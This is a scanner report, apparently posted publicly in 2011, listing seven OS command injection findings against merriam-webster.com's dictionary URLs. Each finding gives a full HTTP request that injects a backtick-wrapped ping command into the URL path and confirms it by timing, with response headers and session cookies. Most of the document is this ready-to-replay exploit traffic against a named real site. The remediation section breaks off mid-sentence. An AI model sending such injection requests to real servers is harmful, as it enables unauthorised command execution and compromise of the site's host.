OS Command Injection, www.merriam-webster.com, CWE-78

CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

Report generated by XSS.CX at Mon Mar 07 19:16:11 CST 2011.


The DORK Report

Loading

1. OS command injection

1.1. http://www.merriam-webster.com/dictionary/se [REST URL parameter 2]

1.2. http://www.merriam-webster.com/dictionary/si [REST URL parameter 2]

1.3. http://www.merriam-webster.com/dictionary/so [REST URL parameter 2]

1.4. http://www.merriam-webster.com/dictionary/ss [REST URL parameter 2]

1.5. http://www.merriam-webster.com/dictionary/x [REST URL parameter 2]

1.6. http://www.merriam-webster.com/dictionary/xss [REST URL parameter 2]

1.7. http://www.merriam-webster.com/dictionary/xu [REST URL parameter 2]



1. OS command injection
There are 7 instances of this issue:

Issue background

Operating system command injection vulnerabilities arise when an application incorporates user-controllable data into a command that is processed by a shell command interpreter. If the user data is not strictly validated, an attacker can use shell metacharacters to modify the command to be executed, and inject arbitrary further commands that will be executed by the server.

OS command injection vulnerabilities are usually very serious and may lead to compromise of the server hosting the application, or of the application's own data and functionality. The exact potential for exploitation may depend upon the security context in which the command is executed, and the privileges which this context has regarding sensitive resources on the server.

Issue remediation

If possible, applications should avoid incorporating user-controllable data into operating system commands. In almost every situation, there are safer alternative methods of performing server-level tasks, which cannot be manipulated to perform additional commands than the one intended.

If it is considered unavoidable to incorporate user-supplied data into operating system commands, the following two layers of defense should be used to prevent attacks:



1.1. http://www.merriam-webster.com/dictionary/se [REST URL parameter 2]  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.merriam-webster.com
Path:   /dictionary/se

Issue detail

The REST URL parameter 2 appears to be vulnerable to OS command injection attacks. It is possible to use backtick characters (`) to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses, however it is possible to inject time delay commands to verify the existence of the vulnerability.

The payload `ping%20-c%2020%20127.0.0.1` was submitted in the REST URL parameter 2. The application took 19198 milliseconds to respond to the request, compared with 331 milliseconds for the original request, indicating that the injected command caused a time delay.

Request

GET /dictionary/se`ping%20-c%2020%20127.0.0.1` HTTP/1.1
Host: www.merriam-webster.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=117464725.1299459372.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); jw-zid=mwvideo_autosilent2; pview=2; jw-autostart-view=1; __utma=117464725.1369065708.1299459372.1299459372.1299459372.1; __utmc=117464725; ptime=1299459986; __utmb=117464725.2.10.1299459372; __qca=P0-693446849-1299459372337; __qseg=Q_D|Q_T|Q_2884|Q_2775|Q_1799|Q_1361|Q_1360|Q_1355|Q_1353|Q_1349|Q_1345|Q_1343|Q_1340;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Set-Cookie: pview=3; expires=Mon, 07-Mar-2011 01:06:26 GMT; path=/
Set-Cookie: ptime=1299459986; expires=Mon, 07-Mar-2011 01:06:26 GMT; path=/
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 4841
Date: Mon, 07 Mar 2011 01:21:49 GMT
X-Varnish: 2082767974
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Content-Type" cont
...[SNIP]...

1.2. http://www.merriam-webster.com/dictionary/si [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.merriam-webster.com
Path:   /dictionary/si

Issue detail

The REST URL parameter 2 appears to be vulnerable to OS command injection attacks. It is possible to use backtick characters (`) to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses, however it is possible to inject time delay commands to verify the existence of the vulnerability.

The payload `ping%20-c%2020%20127.0.0.1` was submitted in the REST URL parameter 2. The application took 19208 milliseconds to respond to the request, compared with 256 milliseconds for the original request, indicating that the injected command caused a time delay.

Request

GET /dictionary/si`ping%20-c%2020%20127.0.0.1` HTTP/1.1
Host: www.merriam-webster.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=117464725.1299459372.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); jw-zid=mwvideo_autosilent2; pview=2; jw-autostart-view=1; __utma=117464725.1369065708.1299459372.1299459372.1299459372.1; __utmc=117464725; ptime=1299459986; __utmb=117464725.2.10.1299459372; __qca=P0-693446849-1299459372337; __qseg=Q_D|Q_T|Q_2884|Q_2775|Q_1799|Q_1361|Q_1360|Q_1355|Q_1353|Q_1349|Q_1345|Q_1343|Q_1340;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Set-Cookie: pview=3; expires=Mon, 07-Mar-2011 01:06:26 GMT; path=/
Set-Cookie: ptime=1299459986; expires=Mon, 07-Mar-2011 01:06:26 GMT; path=/
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 4844
Date: Mon, 07 Mar 2011 01:21:10 GMT
X-Varnish: 2082753398
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Content-Type" cont
...[SNIP]...

1.3. http://www.merriam-webster.com/dictionary/so [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.merriam-webster.com
Path:   /dictionary/so

Issue detail

The REST URL parameter 2 appears to be vulnerable to OS command injection attacks. It is possible to use backtick characters (`) to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses, however it is possible to inject time delay commands to verify the existence of the vulnerability.

The payload `ping%20-c%2020%20127.0.0.1` was submitted in the REST URL parameter 2. The application took 19201 milliseconds to respond to the request, compared with 483 milliseconds for the original request, indicating that the injected command caused a time delay.

Request

GET /dictionary/so`ping%20-c%2020%20127.0.0.1` HTTP/1.1
Host: www.merriam-webster.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=117464725.1299459372.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); jw-zid=mwvideo_autosilent2; pview=2; jw-autostart-view=1; __utma=117464725.1369065708.1299459372.1299459372.1299459372.1; __utmc=117464725; ptime=1299459986; __utmb=117464725.2.10.1299459372; __qca=P0-693446849-1299459372337; __qseg=Q_D|Q_T|Q_2884|Q_2775|Q_1799|Q_1361|Q_1360|Q_1355|Q_1353|Q_1349|Q_1345|Q_1343|Q_1340;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Set-Cookie: pview=3; expires=Mon, 07-Mar-2011 01:06:26 GMT; path=/
Set-Cookie: ptime=1299459986; expires=Mon, 07-Mar-2011 01:06:26 GMT; path=/
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 4844
Date: Mon, 07 Mar 2011 01:22:07 GMT
X-Varnish: 2082774786
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Content-Type" cont
...[SNIP]...

1.4. http://www.merriam-webster.com/dictionary/ss [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.merriam-webster.com
Path:   /dictionary/ss

Issue detail

The REST URL parameter 2 appears to be vulnerable to OS command injection attacks. It is possible to use backtick characters (`) to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses, however it is possible to inject time delay commands to verify the existence of the vulnerability.

The payload `ping%20-c%2020%20127.0.0.1` was submitted in the REST URL parameter 2. The application took 19203 milliseconds to respond to the request, compared with 248 milliseconds for the original request, indicating that the injected command caused a time delay.

Request

GET /dictionary/ss`ping%20-c%2020%20127.0.0.1` HTTP/1.1
Host: www.merriam-webster.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=117464725.1299459372.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); jw-zid=mwvideo_autosilent2; pview=2; jw-autostart-view=1; __utma=117464725.1369065708.1299459372.1299459372.1299459372.1; __utmc=117464725; ptime=1299459986; __utmb=117464725.2.10.1299459372; __qca=P0-693446849-1299459372337; __qseg=Q_D|Q_T|Q_2884|Q_2775|Q_1799|Q_1361|Q_1360|Q_1355|Q_1353|Q_1349|Q_1345|Q_1343|Q_1340;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Set-Cookie: pview=3; expires=Mon, 07-Mar-2011 01:06:26 GMT; path=/
Set-Cookie: ptime=1299459986; expires=Mon, 07-Mar-2011 01:06:26 GMT; path=/
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 4844
Date: Mon, 07 Mar 2011 01:20:03 GMT
X-Varnish: 2082728846
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Content-Type" cont
...[SNIP]...

1.5. http://www.merriam-webster.com/dictionary/x [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.merriam-webster.com
Path:   /dictionary/x

Issue detail

The REST URL parameter 2 appears to be vulnerable to OS command injection attacks. It is possible to use backtick characters (`) to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses, however it is possible to inject time delay commands to verify the existence of the vulnerability.

The payload `ping%20-c%2020%20127.0.0.1` was submitted in the REST URL parameter 2. The application took 19204 milliseconds to respond to the request, compared with 410 milliseconds for the original request, indicating that the injected command caused a time delay.

Request

GET /dictionary/x`ping%20-c%2020%20127.0.0.1` HTTP/1.1
Host: www.merriam-webster.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=117464725.1299459372.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); jw-zid=mwvideo_autosilent2; pview=2; jw-autostart-view=1; __utma=117464725.1369065708.1299459372.1299459372.1299459372.1; __utmc=117464725; ptime=1299459986; __utmb=117464725.2.10.1299459372; __qca=P0-693446849-1299459372337; __qseg=Q_D|Q_T|Q_2884|Q_2775|Q_1799|Q_1361|Q_1360|Q_1355|Q_1353|Q_1349|Q_1345|Q_1343|Q_1340;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Set-Cookie: pview=3; expires=Mon, 07-Mar-2011 01:06:26 GMT; path=/
Set-Cookie: ptime=1299459986; expires=Mon, 07-Mar-2011 01:06:26 GMT; path=/
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 4838
Date: Mon, 07 Mar 2011 01:21:39 GMT
X-Varnish: 2082764501
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Content-Type" cont
...[SNIP]...

1.6. http://www.merriam-webster.com/dictionary/xss [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.merriam-webster.com
Path:   /dictionary/xss

Issue detail

The REST URL parameter 2 appears to be vulnerable to OS command injection attacks. It is possible to use backtick characters (`) to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses, however it is possible to inject time delay commands to verify the existence of the vulnerability.

The payload `ping%20-c%2020%20127.0.0.1` was submitted in the REST URL parameter 2. The application took 20202 milliseconds to respond to the request, compared with 1270 milliseconds for the original request, indicating that the injected command caused a time delay.

Request

GET /dictionary/xss`ping%20-c%2020%20127.0.0.1` HTTP/1.1
Host: www.merriam-webster.com
Proxy-Connection: keep-alive
Referer: http://www.merriam-webster.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qseg=Q_D|Q_T|Q_2884|Q_2775|Q_1799|Q_1361|Q_1360|Q_1355|Q_1353|Q_1349|Q_1345|Q_1343|Q_1340; __qca=P0-693446849-1299459372337; __utmz=117464725.1299459372.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=117464725.1369065708.1299459372.1299459372.1299459372.1; __utmc=117464725; __utmb=117464725.1.10.1299459372

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Set-Cookie: pview=2; expires=Mon, 07-Mar-2011 01:35:32 GMT; path=/
Set-Cookie: ptime=1299461732; expires=Mon, 07-Mar-2011 01:35:32 GMT; path=/
Vary: Accept-Encoding
Content-Type: text/html
Date: Mon, 07 Mar 2011 01:25:51 GMT
X-Varnish: 2015583672
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
Content-Length: 30281

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta name="Description" content="De
...[SNIP]...

1.7. http://www.merriam-webster.com/dictionary/xu [REST URL parameter 2]  previous

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.merriam-webster.com
Path:   /dictionary/xu

Issue detail

The REST URL parameter 2 appears to be vulnerable to OS command injection attacks. It is possible to use backtick characters (`) to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses, however it is possible to inject time delay commands to verify the existence of the vulnerability.

The payload `ping%20-c%2020%20127.0.0.1` was submitted in the REST URL parameter 2. The application took 19209 milliseconds to respond to the request, compared with 171 milliseconds for the original request, indicating that the injected command caused a time delay.

Request

GET /dictionary/xu`ping%20-c%2020%20127.0.0.1` HTTP/1.1
Host: www.merriam-webster.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=117464725.1299459372.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); jw-zid=mwvideo_autosilent2; pview=2; jw-autostart-view=1; __utma=117464725.1369065708.1299459372.1299459372.1299459372.1; __utmc=117464725; ptime=1299459986; __utmb=117464725.2.10.1299459372; __qca=P0-693446849-1299459372337; __qseg=Q_D|Q_T|Q_2884|Q_2775|Q_1799|Q_1361|Q_1360|Q_1355|Q_1353|Q_1349|Q_1345|Q_1343|Q_1340;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Set-Cookie: pview=3; expires=Mon, 07-Mar-2011 01:06:26 GMT; path=/
Set-Cookie: ptime=1299459986; expires=Mon, 07-Mar-2011 01:06:26 GMT; path=/
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 4841
Date: Mon, 07 Mar 2011 01:19:39 GMT
X-Varnish: 2082719229
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Content-Type" cont
...[SNIP]...

Report generated by XSS.CX at Mon Mar 07 19:16:11 CST 2011.